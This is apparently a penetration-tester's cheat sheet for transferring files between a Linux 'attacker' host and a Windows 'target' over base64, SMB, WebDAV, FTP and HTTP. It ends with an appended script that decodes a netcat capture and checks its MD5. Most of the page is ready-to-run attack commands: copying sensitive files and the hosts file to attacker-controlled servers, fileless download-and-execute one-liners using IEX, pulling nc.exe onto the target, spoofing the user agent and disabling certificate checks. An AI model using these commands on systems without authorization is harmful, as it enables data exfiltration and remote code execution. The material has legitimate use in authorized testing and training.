TODO: add more from here
Base64#
One-liner string comparison for fish, zsh and bash (for hash comparison)
[ '0733351879b2fa9bd05c7ca3061529c0' = '0733351879b2fa9bd05c7ca3061529c0' ] && echo true || echo false
The space after [ is very important. Yes, [ is a binary in /usr/bin/[
One-liner to uppercase all letters
echo '0733351879b2fa9bd05c7ca3061529c0' | tr '[:lower:]' '[:upper:]'
Download#
Convert file on linux attacker to base64 text
base64 -w 0 ./file
# Get MD5 hash to compare integrity
md5sum ./file
Convert base64 text to file on Windows target
[System.IO.File]::WriteAllBytes(".\output.file", [System.Convert]::FromBase64String("aGVsbG8="))
# Get MD5 hash to compare integrity
Get-FileHash .\output.file -Algorithm md5
Upload#
Convert file on Windows target to base64 text
[Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\fullpath\input.file"))
certutil -encode .\input.file b64.txt
# Get MD5 hash to compare integrity
Get-FileHash .\input.file -Algorithm md5
type b64.txt
# copy the text
del b64.txt
Convert base64 text to file on Linux attacker
echo 'aGVsbG8=' | base64 -d > ./file
# Get MD5 hash to compare integrity
md5sum ./file
SMB#
Open an SMB server on Linux attacker
sudo impacket-smbserver share -smb2support /tmp/smbshare
Mount#
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
net use n: \\<attacker-ip>\share /user:test test
Download#
copy \\<attacker-ip>\share\<file>
Upload#
copy .\sensitive.file \\<attacker-ip>\share\
WebDav#
Installation on Linux attacker
sudo apt install python3-wsgidav python3-cheroot
Open a WebDAV listener, port 80
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
Download#
copy \\<attacker-ip>\DavWWWRoot\<file>
copy \\<attacker-ip>\sharefolder\<file>
Upload#
copy .\sensitive.file \\<attacker-ip>\DavWWWRoot\
copy .\sensitive.file \\<attacker-ip>\sharefolder\
The commands are the same as for SMB, on Windows at least. WebDAV is an HTTP module that makes an HTTP server behave like a file share server.
FTP#
Download#
Open an FTP server on Linux attacker
sudo python3 -m pyftpdlib --port 21
Download file from FTP server on Windows target
(New-Object Net.WebClient).DownloadString('ftp://<attacker-ip>/<file>')
Or, if you can't execute the above and don't have an interactive shell
echo open 192.168.49.128 > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo GET file.txt >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt
Upload#
Open a writable FTP server on Linux attacker
sudo python3 -m pyftpdlib --port 21 --write
Upload file to FTP server on Windows target
(New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')
Or, if you can't execute the above and don't have an interactive shell
echo open 192.168.49.128 > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt
HTTP server#
Download#
Open an HTTP server on Linux attacker
python3 -m http.server 8080
Download file from HTTP server on Windows target
(New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')
# Not blocking execution
(New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>')
Or, if the SSL certificate is invalid, skip validation (this applies to every later request in the same PowerShell session)
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
Or, filelessly, download a PowerShell script and execute it
IEX (New-Object Net.WebClient).DownloadString('<URL>')
Invoke-WebRequest -UseBasicParsing https://<ip>/file.ps1 | IEX
Or, change the user agent. First list the available user agents
[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl
Then use one of them
$UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe"
Upload#
Install and run HTTP upload server on Linux attacker
pipx install uploadserver
python3 -m uploadserver
Install PSUpload on Windows target
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Upload file to HTTP server
Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts
Or, using native windows tools. A little cranky#
On Linux attacker, open netcat listener.
nc -lvnp 8080
Note that when the Windows target connects, it will send an HTTP request, so you have to remove the HTTP headers and keep only the base64 string
Convert file to base64 string on Windows
$b64 = [System.convert]::ToBase64String((Get-Content -Path '.\file' -Encoding Byte))
Upload
Invoke-WebRequest -Uri http://192.168.49.128:8080/ -Method POST -Body $b64
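Added example, not part of the original page: stripping the HTTP headers from the netcat capture, decoding the base64 body and checking the MD5 against the value Get-FileHash printed (uppercase hex, while md5sum prints lowercase). It assumes the listener output was saved to a file, e.g. nc -lvnp 8080 > capture.txt; the function names and the sample request are hypothetical and constructed for the demo.

```bash
#!/bin/sh
# Added example, not from the original page.
# Assumption: the raw request was saved with  nc -lvnp 8080 > capture.txt

# extract_upload CAPTURE OUTFILE EXPECTED_MD5
# Returns 0 if the decoded file matches the hash, 1 on mismatch, 2 on decode error.
extract_upload() (
    capture=$1; outfile=$2; expected=$3
    # HTTP lines end in CRLF: drop the CRs, then delete everything up to and
    # including the first blank line (request line + headers) and decode the body.
    tr -d '\r' < "$capture" | sed '1,/^$/d' | base64 -d > "$outfile" || exit 2
    actual=$(md5sum "$outfile" | cut -d ' ' -f 1)
    # Get-FileHash prints uppercase hex, md5sum lowercase: normalise before comparing.
    expected=$(printf '%s' "$expected" | tr '[:upper:]' '[:lower:]')
    [ "$actual" = "$expected" ]
)

# Constructed sample: a POST shaped like the one Invoke-WebRequest sends,
# with the body "aGVsbG8=" (base64 of "hello"). Header values are made up.
make_sample_capture() {
    printf 'POST / HTTP/1.1\r\nUser-Agent: constructed-sample\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: 192.168.49.128:8080\r\nContent-Length: 8\r\n\r\naGVsbG8=' > "$1"
}

tmpdir=$(mktemp -d)
make_sample_capture "$tmpdir/capture.txt"
# MD5 of "hello" written the way Get-FileHash would print it (constructed value).
if extract_upload "$tmpdir/capture.txt" "$tmpdir/file" 5D41402ABC4B2A76B9719D911017C592; then
    echo "integrity ok"
else
    echo "hash mismatch or decode error"
fi
```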